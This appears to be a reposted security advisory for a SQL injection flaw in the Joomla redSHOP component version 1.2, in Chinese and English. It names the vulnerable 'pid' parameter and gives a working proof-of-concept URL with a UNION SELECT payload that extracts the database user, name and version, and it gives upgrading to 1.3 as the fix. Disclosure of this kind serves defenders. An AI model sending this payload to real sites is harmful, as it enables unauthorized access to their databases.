-------------------------------------------- Joomla! redSHOP component v1.2 SQL Injection -------------------------------------------- == 概述 == - 影响产品: Joomla! redSHOP component - 下载地址: http://redcomponent.com/redcomponent/redshop - 开发者: redcomponent - 影响版本: 1.2有效,其他版本可能也会有效 - 漏洞 发现者: Matias Fontanini == 缺陷 == When using the "addtocompare" task, the component does not correctly sanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL Injection attacks. The following proof of concept request retrieves the database user, name and version: http://www.2cto.com /index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 == 解决方案 == 升级到1.3版本
查看更多关于Joomla组件 redSHOP 1.2 SQL注射 - 网站安全 - 自学php的详细内容...